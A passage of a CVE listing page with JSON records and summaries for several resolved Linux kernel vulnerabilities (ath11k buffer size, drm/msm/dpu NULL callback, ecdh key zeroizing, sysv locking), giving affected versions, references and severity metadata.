          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: decrease MHI channel buffer length to 8KB\n\nCurrently buf_len field of ath11k_mhi_config_qca6390 is assigned\nwith 0, making MHI use a default size, 64KB, to allocate channel\nbuffers. This is likely to fail in some scenarios where system\nmemory is highly fragmented and memory compaction or reclaim is\nnot allowed.\n\nThere is a fail report which is caused by it:\nkworker/u32:45: page allocation failure: order:4, mode:0x40c00(GFP_NOIO|__GFP_COMP), nodemask=(null),cpuset=/,mems_allowed=0\nCPU: 0 PID: 19318 Comm: kworker/u32:45 Not tainted 6.8.0-rc3-1.gae4495f-default #1 openSUSE Tumbleweed (unreleased) 493b6d5b382c603654d7a81fc3c144d59a1dfceb\nWorkqueue: events_unbound async_run_entry_fn\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x47/0x60\n warn_alloc+0x13a/0x1b0\n ? srso_alias_return_thunk+0x5/0xfbef5\n ? __alloc_pages_direct_compact+0xab/0x210\n __alloc_pages_slowpath.constprop.0+0xd3e/0xda0\n __alloc_pages+0x32d/0x350\n ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n __kmalloc_large_node+0x72/0x110\n __kmalloc+0x37c/0x480\n ? mhi_map_single_no_bb+0x77/0xf0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n __mhi_prepare_for_transfer+0x44/0x80 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n ? __pfx_____mhi_prepare_for_transfer+0x10/0x10 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814]\n device_for_each_child+0x5c/0xa0\n ? __pfx_pci_pm_resume+0x10/0x10\n ath11k_core_resume+0x65/0x100 [ath11k a5094e22d7223135c40d93c8f5321cf09fd85e4e]\n ? srso_alias_return_thunk+0x5/0xfbef5\n ath11k_pci_pm_resume+0x32/0x60 [ath11k_pci 830b7bfc3ea80ebef32e563cafe2cb55e9cc73ec]\n ? srso_alias_return_thunk+0x5/0xfbef5\n dpm_run_callback+0x8c/0x1e0\n device_resume+0x104/0x340\n ? __pfx_dpm_watchdog_handler+0x10/0x10\n async_resume+0x1d/0x30\n async_run_entry_fn+0x32/0x120\n process_one_work+0x168/0x330\n worker_thread+0x2f5/0x410\n ? __pfx_worker_thread+0x10/0x10\n kthread+0xe8/0x120\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x34/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nActually those buffers are used only by QMI target -\u003e host communication.\nAnd for WCN6855 and QCA6390, the largest packet size for that is less\nthan 6KB. So change buf_len field to 8KB, which results in order 1\nallocation if page size is 4KB. In this way, we can at least save some\nmemory, and as well as decrease the possibility of allocation failure\nin those scenarios.\n\nTested-on: WCN6855 hw2.0 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.30"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:49.797Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/805a1cdde82fec00c7471a393f4bb437b2741559"
        },
        {
          "url": "https://git.kernel.org/stable/c/6597a6687af54e2cb58371cf8f6ee4dd85c537de"
        },
        {
          "url": "https://git.kernel.org/stable/c/138fdeac75fb7512a7f9f1c3b236cd2e754af793"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae5876b3b7b2243d874e2afa099e7926122087a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cca1bddf9ef080503c15378cecf4877f7510015"
        }
      ],
      "title": "wifi: ath11k: decrease MHI channel buffer length to 8KB",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35938",
    "datePublished": "2024-05-19T10:10:44.279Z",
    "dateReserved": "2024-05-17T13:50:33.131Z",
    "dateUpdated": "2025-05-04T09:08:49.797Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38622 (GCVE-0-2024-38622)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-05-04 09:15

Title

drm/msm/dpu: Add callback function pointer check before its call

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Add callback function pointer check before its call In dpu_core_irq_callback_handler() callback function pointer is compared to NULL, but then callback function is unconditionally called by this pointer. Fix this bug by adding conditional return. Found by Linux Verification Center (linuxtesting.org) with SVACE. Patchwork: https://patchwork.freedesktop.org/patch/588237/

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/873f67699114452c2…
	https://git.kernel.org/stable/c/9078630ed7f8f25d6…
	https://git.kernel.org/stable/c/530f272053a5e7224…

Impacted products

Vendor

Product

Version

Linux

Affected: c929ac60b3ed34accd25a052a4833e418900f466 , < 873f67699114452c2a996c4e10faac8ff860c241 (git)
Affected: c929ac60b3ed34accd25a052a4833e418900f466 , < 9078630ed7f8f25d65d11823e7f2b11a8e2f4f0f (git)
Affected: c929ac60b3ed34accd25a052a4833e418900f466 , < 530f272053a5e72243a9cb07bb1296af6c346002 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38622",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:23:40.246723Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:23:53.817Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:26.011Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/873f67699114452c2a996c4e10faac8ff860c241"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9078630ed7f8f25d65d11823e7f2b11a8e2f4f0f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/530f272053a5e72243a9cb07bb1296af6c346002"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "873f67699114452c2a996c4e10faac8ff860c241",
              "status": "affected",
              "version": "c929ac60b3ed34accd25a052a4833e418900f466",
              "versionType": "git"
            },
            {
              "lessThan": "9078630ed7f8f25d65d11823e7f2b11a8e2f4f0f",
              "status": "affected",
              "version": "c929ac60b3ed34accd25a052a4833e418900f466",
              "versionType": "git"
            },
            {
              "lessThan": "530f272053a5e72243a9cb07bb1296af6c346002",
              "status": "affected",
              "version": "c929ac60b3ed34accd25a052a4833e418900f466",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add callback function pointer check before its call\n\nIn dpu_core_irq_callback_handler() callback function pointer is compared to NULL,\nbut then callback function is unconditionally called by this pointer.\nFix this bug by adding conditional return.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.\n\nPatchwork: https://patchwork.freedesktop.org/patch/588237/"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:30.370Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/873f67699114452c2a996c4e10faac8ff860c241"
        },
        {
          "url": "https://git.kernel.org/stable/c/9078630ed7f8f25d65d11823e7f2b11a8e2f4f0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/530f272053a5e72243a9cb07bb1296af6c346002"
        }
      ],
      "title": "drm/msm/dpu: Add callback function pointer check before its call",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38622",
    "datePublished": "2024-06-21T10:18:15.625Z",
    "dateReserved": "2024-06-18T19:36:34.945Z",
    "dateUpdated": "2025-05-04T09:15:30.370Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42098 (GCVE-0-2024-42098)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2026-01-05 10:51

Title

crypto: ecdh - explicitly zeroize private_key

Summary

In the Linux kernel, the following vulnerability has been resolved: crypto: ecdh - explicitly zeroize private_key private_key is overwritten with the key parameter passed in by the caller (if present), or alternatively a newly generated private key. However, it is possible that the caller provides a key (or the newly generated key) which is shorter than the previous key. In that scenario, some key material from the previous key would not be overwritten. The easiest solution is to explicitly zeroize the entire private_key array first. Note that this patch slightly changes the behavior of this function: previously, if the ecc_gen_privkey failed, the old private_key would remain. Now, the private_key is always zeroized. This behavior is consistent with the case where params.key is set and ecc_is_key_valid fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/39173b04abda87872…
	https://git.kernel.org/stable/c/fd7ef325911eba1b7…
	https://git.kernel.org/stable/c/80575b252ab0358b7…
	https://git.kernel.org/stable/c/d96187eb8e59b572a…
	https://git.kernel.org/stable/c/73e5984e540a76a2e…

Impacted products

Vendor

Product

Version

Linux

Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < 39173b04abda87872b43c331468a4a14f8f05ce8 (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < fd7ef325911eba1b7191b83cb580463242f2090d (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < 80575b252ab0358b7e93895b2a510beb3cb3f975 (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < d96187eb8e59b572a8e6a68b6a9837a867ea29df (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < 73e5984e540a76a2ee1868b91590c922da8c24c9 (git)

Linux

Affected: 4.8
Unaffected: 0 , < 4.8 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:33.618Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39173b04abda87872b43c331468a4a14f8f05ce8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd7ef325911eba1b7191b83cb580463242f2090d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80575b252ab0358b7e93895b2a510beb3cb3f975"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d96187eb8e59b572a8e6a68b6a9837a867ea29df"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73e5984e540a76a2ee1868b91590c922da8c24c9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42098",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:15.393547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:59.924Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "crypto/ecdh.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "39173b04abda87872b43c331468a4a14f8f05ce8",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "fd7ef325911eba1b7191b83cb580463242f2090d",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "80575b252ab0358b7e93895b2a510beb3cb3f975",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "d96187eb8e59b572a8e6a68b6a9837a867ea29df",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "73e5984e540a76a2ee1868b91590c922da8c24c9",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "crypto/ecdh.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.8"
            },
            {
              "lessThan": "4.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: ecdh - explicitly zeroize private_key\n\nprivate_key is overwritten with the key parameter passed in by the\ncaller (if present), or alternatively a newly generated private key.\nHowever, it is possible that the caller provides a key (or the newly\ngenerated key) which is shorter than the previous key. In that\nscenario, some key material from the previous key would not be\noverwritten. The easiest solution is to explicitly zeroize the entire\nprivate_key array first.\n\nNote that this patch slightly changes the behavior of this function:\npreviously, if the ecc_gen_privkey failed, the old private_key would\nremain. Now, the private_key is always zeroized. This behavior is\nconsistent with the case where params.key is set and ecc_is_key_valid\nfails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:50.674Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/39173b04abda87872b43c331468a4a14f8f05ce8"
        },
        {
          "url": "https://git.kernel.org/stable/c/fd7ef325911eba1b7191b83cb580463242f2090d"
        },
        {
          "url": "https://git.kernel.org/stable/c/80575b252ab0358b7e93895b2a510beb3cb3f975"
        },
        {
          "url": "https://git.kernel.org/stable/c/d96187eb8e59b572a8e6a68b6a9837a867ea29df"
        },
        {
          "url": "https://git.kernel.org/stable/c/73e5984e540a76a2ee1868b91590c922da8c24c9"
        }
      ],
      "title": "crypto: ecdh - explicitly zeroize private_key",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42098",
    "datePublished": "2024-07-29T17:39:33.395Z",
    "dateReserved": "2024-07-29T15:50:41.173Z",
    "dateUpdated": "2026-01-05T10:51:50.674Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52699 (GCVE-0-2023-52699)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:16

Title

sysv: don't call sb_bread() with pointers_lock held

Summary

In the Linux kernel, the following vulnerability has been resolved: sysv: don't call sb_bread() with pointers_lock held syzbot is reporting sleep in atomic context in SysV filesystem [1], for sb_bread() is called with rw_spinlock held. A "write_lock(&pointers_lock) => read_lock(&pointers_lock) deadlock" bug and a "sb_bread() with write_lock(&pointers_lock)" bug were introduced by "Replace BKL for chain locking with sysvfs-private rwlock" in Linux 2.5.12. Then, "[PATCH] err1-40: sysvfs locking fix" in Linux 2.6.8 fixed the former bug by moving pointers_lock lock to the callers, but instead introduced a "sb_bread() with read_lock(&pointers_lock)" bug (which made this problem easier to hit). Al Viro suggested that why not to do like get_branch()/get_block()/ find_shared() in Minix filesystem does. And doing like that is almost a revert of "[PATCH] err1-40: sysvfs locking fix" except that get_branch() from with find_shared() is called without write_lock(&pointers_lock).

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/13b33feb2ebddc2b1…
	https://git.kernel.org/stable/c/1b4fe801b5bedec2b…
	https://git.kernel.org/stable/c/674c1c4229e743070…
	https://git.kernel.org/stable/c/fd203d2c671bdee9a…
	https://git.kernel.org/stable/c/53cb1e52c9db618c0…
	https://git.kernel.org/stable/c/89e8524135a3902e7…
	https://git.kernel.org/stable/c/a69224223746ab96d…
	https://git.kernel.org/stable/c/f123dc86388cb669c…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 13b33feb2ebddc2b1aa607f553566b18a4af1d76 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 674c1c4229e743070e09db63a23442950ff000d1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < fd203d2c671bdee9ab77090ff394d3b71b627927 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 53cb1e52c9db618c08335984d1ca80db220ccf09 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 89e8524135a3902e7563a5a59b7b5ec1bf4904ac (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < a69224223746ab96d43e5db9d22d136827b7e2d3 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f123dc86388cb669c3d6322702dc441abc35c31e (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "LOW",
              "baseScore": 5.3,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2023-52699",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T15:05:59.108260Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T17:06:03.220Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:11:35.577Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13b33feb2ebddc2b1aa607f553566b18a4af1d76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/674c1c4229e743070e09db63a23442950ff000d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd203d2c671bdee9ab77090ff394d3b71b627927"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/53cb1e52c9db618c08335984d1ca80db220ccf09"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89e8524135a3902e7563a5a59b7b5ec1bf4904ac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a69224223746ab96d43e5db9d22d136827b7e2d3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f123dc86388cb669c3d6322702dc441abc35c31e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/sysv/itree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "13b33feb2ebddc2b1aa607f553566b18a4af1d76",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "674c1c4229e743070e09db63a23442950ff000d1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "fd203d2c671bdee9ab77090ff394d3b71b627927",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "53cb1e52c9db618c08335984d1ca80db220ccf09",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "89e8524135a3902e7563a5a59b7b5ec1bf4904ac",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "a69224223746ab96d43e5db9d22d136827b7e2d3",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "f123dc86388cb669c3d6322702dc441abc35c31e",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/sysv/itree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
